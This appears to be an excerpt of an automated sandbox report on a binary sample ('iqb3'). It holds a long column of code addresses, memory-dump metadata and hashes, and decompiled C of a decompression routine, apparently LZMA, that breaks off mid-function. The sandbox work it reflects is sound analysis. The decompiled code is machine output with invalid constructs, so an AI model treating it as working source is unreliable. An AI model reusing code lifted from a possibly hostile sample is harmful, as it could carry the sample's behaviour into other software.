                                                                      0x00406310
                                                                      0x00406313
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x0040631d
                                                                      0x0040631e
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406557
                                                                      0x0040655b
                                                                      0x00406579
                                                                      0x0040657c
                                                                      0x00406583
                                                                      0x00406586
                                                                      0x00406589
                                                                      0x0040658c
                                                                      0x0040658f
                                                                      0x00406592
                                                                      0x00406594
                                                                      0x0040659b
                                                                      0x0040659c
                                                                      0x0040659e
                                                                      0x004065a1
                                                                      0x004065a4
                                                                      0x004065a7
                                                                      0x004065a7
                                                                      0x004065ac
                                                                      0x00000000
                                                                      0x004065ac
                                                                      0x0040655d
                                                                      0x00406560
                                                                      0x00406563
                                                                      0x0040656d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065c1
                                                                      0x004065c5
                                                                      0x004065e8
                                                                      0x004065eb
                                                                      0x004065ee
                                                                      0x004065f8
                                                                      0x004065c7
                                                                      0x004065c7
                                                                      0x004065ca
                                                                      0x004065cd
                                                                      0x004065d0
                                                                      0x004065dd
                                                                      0x004065e0
                                                                      0x004065e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406604
                                                                      0x00406608
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040660e
                                                                      0x00406612
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406618
                                                                      0x0040661a
                                                                      0x0040661e
                                                                      0x0040661e
                                                                      0x00406621
                                                                      0x00406625
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406675
                                                                      0x00406679
                                                                      0x00406680
                                                                      0x00406683
                                                                      0x00406686
                                                                      0x00406690
                                                                      0x00000000
                                                                      0x00406690
                                                                      0x0040667b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040669c
                                                                      0x004066a0
                                                                      0x004066a7
                                                                      0x004066aa
                                                                      0x004066ad
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066b0
                                                                      0x004066b3
                                                                      0x004066b6
                                                                      0x004066b6
                                                                      0x004066b9
                                                                      0x004066bc
                                                                      0x004066bf
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066c9
                                                                      0x004066ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040675c
                                                                      0x0040675c
                                                                      0x00406760
                                                                      0x00406afe
                                                                      0x00000000
                                                                      0x00406afe
                                                                      0x00406766
                                                                      0x00406769
                                                                      0x0040676c
                                                                      0x00406770
                                                                      0x00406773
                                                                      0x00406779
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406351
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406ac2
                                                                      0x00000000
                                                                      0x00406ac2
                                                                      0x0040635b
                                                                      0x0040635e
                                                                      0x00406361
                                                                      0x00406365
                                                                      0x00406368
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406373
                                                                      0x00406376
                                                                      0x00406376
                                                                      0x00406379
                                                                      0x0040637c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406382
                                                                      0x00406388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x00406392
                                                                      0x00406395
                                                                      0x00406398
                                                                      0x0040639b
                                                                      0x0040639e
                                                                      0x0040639f
                                                                      0x004063a2
                                                                      0x004063a4
                                                                      0x004063aa
                                                                      0x004063ad
                                                                      0x004063b0
                                                                      0x004063b3
                                                                      0x004063b6
                                                                      0x004063b9
                                                                      0x004063bc
                                                                      0x004063d8
                                                                      0x004063db
                                                                      0x004063de
                                                                      0x004063e1
                                                                      0x004063e8
                                                                      0x004063ec
                                                                      0x004063ee
                                                                      0x004063f2
                                                                      0x004063be
                                                                      0x004063be
                                                                      0x004063c2
                                                                      0x004063ca
                                                                      0x004063cf
                                                                      0x004063d1
                                                                      0x004063d3
                                                                      0x004063d3
                                                                      0x004063f5
                                                                      0x004063fc
                                                                      0x004063ff
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x0040640a
                                                                      0x0040640a
                                                                      0x0040640e
                                                                      0x00406ace
                                                                      0x00000000
                                                                      0x00406ace
                                                                      0x00406414
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641e
                                                                      0x00406421
                                                                      0x00406427
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x0040642c
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x00406435
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406437
                                                                      0x0040643a
                                                                      0x0040643d
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406446
                                                                      0x00406449
                                                                      0x0040644c
                                                                      0x0040644f
                                                                      0x00406452
                                                                      0x00406455
                                                                      0x0040646d
                                                                      0x00406470
                                                                      0x00406473
                                                                      0x00406476
                                                                      0x00406476
                                                                      0x00406479
                                                                      0x0040647d
                                                                      0x0040647f
                                                                      0x00406457
                                                                      0x00406457
                                                                      0x0040645f
                                                                      0x00406464
                                                                      0x00406466
                                                                      0x00406468
                                                                      0x00406468
                                                                      0x00406482
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ce
                                                                      0x004064ce
                                                                      0x004064d2
                                                                      0x00406ada
                                                                      0x00000000
                                                                      0x00406ada
                                                                      0x004064d8
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e2
                                                                      0x004064e5
                                                                      0x004064eb
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064f0
                                                                      0x004064f3
                                                                      0x004064f3
                                                                      0x004064f9
                                                                      0x00406497
                                                                      0x00406497
                                                                      0x0040649a
                                                                      0x00000000
                                                                      0x0040649a
                                                                      0x004064fb
                                                                      0x004064fb
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x00406507
                                                                      0x0040650a
                                                                      0x0040650d
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00406516
                                                                      0x00406519
                                                                      0x00406531
                                                                      0x00406534
                                                                      0x00406537
                                                                      0x0040653a
                                                                      0x0040653a
                                                                      0x0040653d
                                                                      0x00406541
                                                                      0x00406543
                                                                      0x0040651b
                                                                      0x0040651b
                                                                      0x00406523
                                                                      0x00406528
                                                                      0x0040652a
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x00406546
                                                                      0x0040654d
                                                                      0x00406550
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x004067df
                                                                      0x004067df
                                                                      0x004067e3
                                                                      0x00406b0a
                                                                      0x00000000
                                                                      0x00406b0a
                                                                      0x004067e9
                                                                      0x004067ec
                                                                      0x004067ef
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x004067fc
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x00406801
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065b2
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069ab
                                                                      0x004069af
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069d4
                                                                      0x004069db
                                                                      0x00000000
                                                                      0x004069db
                                                                      0x004069b1
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a9c
                                                                      0x00406a9f
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066d6
                                                                      0x004066d8
                                                                      0x004066df
                                                                      0x004066e0
                                                                      0x004066e2
                                                                      0x004066e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066ed
                                                                      0x004066f0
                                                                      0x004066f3
                                                                      0x004066f5
                                                                      0x004066f7
                                                                      0x004066f7
                                                                      0x004066f8
                                                                      0x004066fb
                                                                      0x00406702
                                                                      0x00406705
                                                                      0x00406713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069f8
                                                                      0x004069f8
                                                                      0x004069fc
                                                                      0x00406b34
                                                                      0x00000000
                                                                      0x00406b34
                                                                      0x00406a02
                                                                      0x00406a05
                                                                      0x00406a08
                                                                      0x00406a0c
                                                                      0x00406a0f
                                                                      0x00406a15
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a1a
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040671b
                                                                      0x0040671e
                                                                      0x00406754
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406887
                                                                      0x00406887
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406b16
                                                                      0x00000000
                                                                      0x00406b16
                                                                      0x00406892
                                                                      0x00406895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040689b
                                                                      0x0040689f
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x00000000
                                                                      0x004068a2
                                                                      0x00406720
                                                                      0x00406722
                                                                      0x00406724
                                                                      0x00406726
                                                                      0x00406729
                                                                      0x0040672a
                                                                      0x0040672c
                                                                      0x0040672e
                                                                      0x00406731
                                                                      0x00406734
                                                                      0x0040674a
                                                                      0x0040674f
                                                                      0x00406787
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x004067b7
                                                                      0x004067b9
                                                                      0x004067c0
                                                                      0x004067c3
                                                                      0x004067c6
                                                                      0x004067c6
                                                                      0x004067cb
                                                                      0x004067cb
                                                                      0x004067cd
                                                                      0x004067d0
                                                                      0x004067d7
                                                                      0x004067da
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x0040680a
                                                                      0x0040680d
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00000000
                                                                      0x00406881
                                                                      0x0040680f
                                                                      0x00406815
                                                                      0x00406818
                                                                      0x0040681b
                                                                      0x0040681e
                                                                      0x00406821
                                                                      0x00406824
                                                                      0x00406827
                                                                      0x0040682a
                                                                      0x0040682d
                                                                      0x00406830
                                                                      0x00406849
                                                                      0x0040684b
                                                                      0x0040684e
                                                                      0x0040684f
                                                                      0x00406852
                                                                      0x00406854
                                                                      0x00406857
                                                                      0x00406859
                                                                      0x0040685b
                                                                      0x0040685e
                                                                      0x00406860
                                                                      0x00406863
                                                                      0x00406867
                                                                      0x00406869
                                                                      0x00406869
                                                                      0x0040686a
                                                                      0x0040686d
                                                                      0x00406870
                                                                      0x00406832
                                                                      0x00406832
                                                                      0x0040683a
                                                                      0x0040683f
                                                                      0x00406841
                                                                      0x00406844
                                                                      0x00406844
                                                                      0x00406873
                                                                      0x0040687a
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687a
                                                                      0x0040678d
                                                                      0x00406790
                                                                      0x00406792
                                                                      0x00406795
                                                                      0x00406798
                                                                      0x0040679b
                                                                      0x0040679d
                                                                      0x004067a0
                                                                      0x004067a3
                                                                      0x004067a3
                                                                      0x004067a6
                                                                      0x004067a6
                                                                      0x004067a9
                                                                      0x004067b0
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b0
                                                                      0x00406736
                                                                      0x00406739
                                                                      0x0040673b
                                                                      0x0040673e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040649d
                                                                      0x0040649d
                                                                      0x004064a1
                                                                      0x00406ae6
                                                                      0x00000000
                                                                      0x00406ae6
                                                                      0x004064a7
                                                                      0x004064aa
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x004064b3
                                                                      0x004064b6
                                                                      0x004064b9
                                                                      0x004064bb
                                                                      0x004064be
                                                                      0x004064c1
                                                                      0x004064c4
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406628
                                                                      0x00406628
                                                                      0x0040662c
                                                                      0x00406af2
                                                                      0x00000000
                                                                      0x00406af2
                                                                      0x00406632
                                                                      0x00406635
                                                                      0x00406638
                                                                      0x0040663b
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406643
                                                                      0x00406646
                                                                      0x00406649
                                                                      0x0040664c
                                                                      0x0040664f
                                                                      0x00406650
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406655
                                                                      0x00406658
                                                                      0x0040665b
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x00406661
                                                                      0x00406663
                                                                      0x00406663
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068af
                                                                      0x004068b2
                                                                      0x004068b5
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068c0
                                                                      0x004068c3
                                                                      0x004068c6
                                                                      0x004068c9
                                                                      0x004068cc
                                                                      0x004068cd
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d5
                                                                      0x004068d8
                                                                      0x004068db
                                                                      0x004068de
                                                                      0x004068e2
                                                                      0x004068e4
                                                                      0x004068e7
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x00000000
                                                                      0x00406666
                                                                      0x004068e7
                                                                      0x00406b1c
                                                                      0x00406b3e
                                                                      0x00406b44
                                                                      0x00406b46
                                                                      0x00406b4d
                                                                      0x00406b4f
                                                                      0x00406b56
                                                                      0x00406b5a
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x004069a0
                                                                      0x00406a26
                                                                      0x00406a2c
                                                                      0x00406a2f
                                                                      0x00406a32
                                                                      0x00406a35
                                                                      0x00406a38
                                                                      0x00406a3b
                                                                      0x00406a3e
                                                                      0x00406a41
                                                                      0x00406a47
                                                                      0x00406a60
                                                                      0x00406a63
                                                                      0x00406a66
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x00406a6f
                                                                      0x00406a70
                                                                      0x00406a73
                                                                      0x00406a49
                                                                      0x00406a49
                                                                      0x00406a51
                                                                      0x00406a56
                                                                      0x00406a58
                                                                      0x00406a5b
                                                                      0x00406a5b
                                                                      0x00406a7d
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00406a7d
                                                                      0x00000000
                                                                      0x004068f2

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                                      • Instruction ID: 0388e715484a44d40d4ddbde005df80b94e1e5136e8ff3af7516764e2fd1b4f7
                                                                      • Opcode Fuzzy Hash: 57f52ef8ebfd3b6830ca252784d29864a174ee9a5c8600b40a037bd56b74384a
                                                                      • Instruction Fuzzy Hash: 0F913170E00229CBDF28CF98C8447ADBBB1FF44305F15816AD816BB281D778AA96DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406604 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406604() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406B5B))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
